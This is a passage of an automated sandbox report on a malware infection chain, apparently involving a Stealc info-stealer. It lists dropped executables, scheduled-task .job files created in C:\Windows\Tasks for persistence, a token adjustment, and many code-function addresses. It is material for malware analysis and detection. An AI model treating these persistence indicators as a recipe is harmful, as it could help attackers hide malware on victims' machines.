Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C8BB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	22_2_6C8BB910
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C85F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	22_2_6C85F280

Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\Tasks\axplong.job			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	File created: C:\Windows\Tasks\Hkbsse.job

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 7_2_001BE440	7_2_001BE440
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 7_2_001F3068	7_2_001F3068
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 7_2_001B4CF0	7_2_001B4CF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 7_2_001E7D83	7_2_001E7D83
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 7_2_001F765B	7_2_001F765B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 7_2_001B4AF0	7_2_001B4AF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 7_2_001F6F09	7_2_001F6F09
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 7_2_001F8720	7_2_001F8720
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 7_2_001F777B	7_2_001F777B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 7_2_001F2BD0	7_2_001F2BD0
Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	Code function: 9_2_02DE0B39	9_2_02DE0B39
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_031ADC74	11_2_031ADC74
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_06B2A6B8	11_2_06B2A6B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_06B267D8	11_2_06B267D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_06B23F50	11_2_06B23F50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_06B2A688	11_2_06B2A688
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_06B26FF8	11_2_06B26FF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_06B26FE8	11_2_06B26FE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_06DCEF40	11_2_06DCEF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_06DC0A0C	11_2_06DC0A0C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_06DC1EF1	11_2_06DC1EF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_06DC1F00	11_2_06DC1F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_06E09548	11_2_06E09548
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_06E013C0	11_2_06E013C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_06E061B0	11_2_06E061B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_06E08C30	11_2_06E08C30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_06E06A80	11_2_06E06A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_06E0CA50	11_2_06E0CA50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_06E0B9A0	11_2_06E0B9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_06E013B0	11_2_06E013B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_06E05E68	11_2_06E05E68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_06E0B985	11_2_06E0B985
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_00402310	14_2_00402310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_004050B0	14_2_004050B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_0042045E	14_2_0042045E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_0040FCE0	14_2_0040FCE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_00419D09	14_2_00419D09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_0041950B	14_2_0041950B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_00415625	14_2_00415625
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_00404EF0	14_2_00404EF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_0040CF7F	14_2_0040CF7F
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Code function: 15_2_02B97770	15_2_02B97770
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Code function: 15_2_02B97762	15_2_02B97762
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Code function: 15_2_02B97468	15_2_02B97468
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Code function: 15_2_02B97458	15_2_02B97458
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Code function: 15_2_08CB0578	15_2_08CB0578
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Code function: 15_2_08CBF540	15_2_08CBF540
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Code function: 15_2_08CB0568	15_2_08CB0568
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Code function: 17_2_00C1DC74	17_2_00C1DC74
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Code function: 17_2_05FA67D0	17_2_05FA67D0
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Code function: 17_2_05FAA3E8	17_2_05FAA3E8
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Code function: 17_2_05FA3F50	17_2_05FA3F50
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Code function: 17_2_05FAA3BD	17_2_05FAA3BD
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Code function: 17_2_05FA6FF8	17_2_05FA6FF8
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Code function: 17_2_05FA6FE8	17_2_05FA6FE8
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Code function: 19_2_00479870	19_2_00479870
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Code function: 19_2_0047A879	19_2_0047A879
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Code function: 19_2_00491462	19_2_00491462
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Code function: 19_2_004B758B	19_2_004B758B
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Code function: 19_2_004B8650	19_2_004B8650
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Code function: 19_2_004B76AB	19_2_004B76AB
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Code function: 19_2_00474AF0	19_2_00474AF0
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Code function: 19_2_004B2B00	19_2_004B2B00
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Code function: 19_2_00493C51	19_2_00493C51
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Code function: 19_2_00490C73	19_2_00490C73
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Code function: 19_2_00474CF0	19_2_00474CF0
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Code function: 19_2_004A7CB3	19_2_004A7CB3
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Code function: 19_2_004B6E39	19_2_004B6E39
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Code function: 19_2_00495FF2	19_2_00495FF2
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Code function: 19_2_004B2F98	19_2_004B2F98
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Code function: 20_2_00629760	20_2_00629760
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Code function: 20_2_00641462	20_2_00641462
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Code function: 20_2_0066758B	20_2_0066758B
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Code function: 20_2_00668650	20_2_00668650
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Code function: 20_2_006676AB	20_2_006676AB
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Code function: 20_2_00624AF0	20_2_00624AF0
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Code function: 20_2_00662B00	20_2_00662B00
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Code function: 20_2_00640C73	20_2_00640C73
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Code function: 20_2_00643C51	20_2_00643C51
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Code function: 20_2_00624CF0	20_2_00624CF0
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Code function: 20_2_00657CB3	20_2_00657CB3
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Code function: 20_2_00666E39	20_2_00666E39
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Code function: 20_2_00645FF2	20_2_00645FF2
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Code function: 20_2_00662F98	20_2_00662F98
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C8535A0	22_2_6C8535A0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C866C80	22_2_6C866C80
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C8B34A0	22_2_6C8B34A0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C8BC4A0	22_2_6C8BC4A0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C8664C0	22_2_6C8664C0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C87D4D0	22_2_6C87D4D0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C85D4E0	22_2_6C85D4E0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C896CF0	22_2_6C896CF0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C8CAC00	22_2_6C8CAC00
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C895C10	22_2_6C895C10
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C8A2C10	22_2_6C8A2C10
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C8C542B	22_2_6C8C542B
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C865440	22_2_6C865440
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C8C545C	22_2_6C8C545C
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C890DD0	22_2_6C890DD0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C8B85F0	22_2_6C8B85F0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C86FD00	22_2_6C86FD00
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C87ED10	22_2_6C87ED10
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C880512	22_2_6C880512
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C8BE680	22_2_6C8BE680
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C875E90	22_2_6C875E90
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C8B4EA0	22_2_6C8B4EA0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C8C76E3	22_2_6C8C76E3
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C85BEF0	22_2_6C85BEF0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C86FEF0	22_2_6C86FEF0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C8A5600	22_2_6C8A5600
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C897E10	22_2_6C897E10
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C8B9E30	22_2_6C8B9E30
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C8A2E4E	22_2_6C8A2E4E
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C874640	22_2_6C874640
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C879E50	22_2_6C879E50
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C893E50	22_2_6C893E50
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C8C6E63	22_2_6C8C6E63
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C85C670	22_2_6C85C670
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C8A77A0	22_2_6C8A77A0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C85DFE0	22_2_6C85DFE0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C886FF0	22_2_6C886FF0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C869F00	22_2_6C869F00
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C897710	22_2_6C897710
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C8860A0	22_2_6C8860A0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C8C50C7	22_2_6C8C50C7
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C87C0E0	22_2_6C87C0E0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C8958E0	22_2_6C8958E0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C867810	22_2_6C867810
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C89B820	22_2_6C89B820
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C8A4820	22_2_6C8A4820
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C878850	22_2_6C878850
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C87D850	22_2_6C87D850
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C89F070	22_2_6C89F070
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C895190	22_2_6C895190
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C8B2990	22_2_6C8B2990
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C85C9A0	22_2_6C85C9A0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C88D9B0	22_2_6C88D9B0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C87A940	22_2_6C87A940
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C86D960	22_2_6C86D960
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C8AB970	22_2_6C8AB970
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C8CB170	22_2_6C8CB170
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C8CBA90	22_2_6C8CBA90
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C8522A0	22_2_6C8522A0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C884AA0	22_2_6C884AA0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C86CAB0	22_2_6C86CAB0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C8C2AB0	22_2_6C8C2AB0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C898AC0	22_2_6C898AC0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C871AF0	22_2_6C871AF0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C89E2F0	22_2_6C89E2F0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C899A60	22_2_6C899A60
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C85F380	22_2_6C85F380
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C8C53C8	22_2_6C8C53C8
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C89D320	22_2_6C89D320
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C855340	22_2_6C855340
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C86C370	22_2_6C86C370
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C95ECD0	22_2_6C95ECD0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C8FECC0	22_2_6C8FECC0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C9C6C00	22_2_6C9C6C00
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C9DAC30	22_2_6C9DAC30
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C90AC60	22_2_6C90AC60
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C996D90	22_2_6C996D90
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C904DB0	22_2_6C904DB0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6CA8CDC0	22_2_6CA8CDC0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6CA88D20	22_2_6CA88D20
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C9CED70	22_2_6C9CED70
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6CA2AD50	22_2_6CA2AD50
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C986E90	22_2_6C986E90
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C90AEC0	22_2_6C90AEC0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C9A0EC0	22_2_6C9A0EC0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C9E0E20	22_2_6C9E0E20
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C99EE70	22_2_6C99EE70
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6CA48FB0	22_2_6CA48FB0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C90EFB0	22_2_6C90EFB0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C9DEFF0	22_2_6C9DEFF0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C900FE0	22_2_6C900FE0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C906F10	22_2_6C906F10
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6CA40F20	22_2_6CA40F20
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C96EF40	22_2_6C96EF40
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C9C2F70	22_2_6C9C2F70
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6CA068E0	22_2_6CA068E0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C950820	22_2_6C950820
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C98A820	22_2_6C98A820
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C9D4840	22_2_6C9D4840
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C9C09B0	22_2_6C9C09B0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C9909A0	22_2_6C9909A0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C9BA9A0	22_2_6C9BA9A0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6CA1C9E0	22_2_6CA1C9E0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C9349F0	22_2_6C9349F0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C956900	22_2_6C956900
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C938960	22_2_6C938960
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C9AEA00	22_2_6C9AEA00
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C9B8A30	22_2_6C9B8A30
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C97CA70	22_2_6C97CA70
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C9A0BA0	22_2_6C9A0BA0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C908BAC	22_2_6C908BAC
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6CA06BE0	22_2_6CA06BE0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6CA2A480	22_2_6CA2A480
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C9464D0	22_2_6C9464D0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C99A4D0	22_2_6C99A4D0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C98A430	22_2_6C98A430
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C964420	22_2_6C964420
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C918460	22_2_6C918460
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C8F45B0	22_2_6C8F45B0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C98E5F0	22_2_6C98E5F0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C9CA5E0	22_2_6C9CA5E0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C958540	22_2_6C958540
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6CA04540	22_2_6CA04540
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C9A0570	22_2_6C9A0570
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6CA48550	22_2_6CA48550
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C962560	22_2_6C962560
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C9246D0	22_2_6C9246D0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C95E6E0	22_2_6C95E6E0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C99E6E0	22_2_6C99E6E0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C95C650	22_2_6C95C650
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C92A7D0	22_2_6C92A7D0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C980700	22_2_6C980700
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C8F8090	22_2_6C8F8090
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C9100B0	22_2_6C9100B0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C9DC0B0	22_2_6C9DC0B0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C9C8010	22_2_6C9C8010
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C9CC000	22_2_6C9CC000
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C94E070	22_2_6C94E070

Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe

Process token adjusted: Security

Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Code function: String function: 0048D7A2 appears 83 times
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Code function: String function: 00487F20 appears 129 times
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Code function: String function: 0048DDE0 appears 44 times
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Code function: String function: 0063DDE0 appears 39 times
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Code function: String function: 0063D7A2 appears 69 times
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Code function: String function: 00637F20 appears 128 times
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: String function: 6C929B10 appears 39 times
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: String function: 6C923620 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: String function: 6C88CBE8 appears 134 times
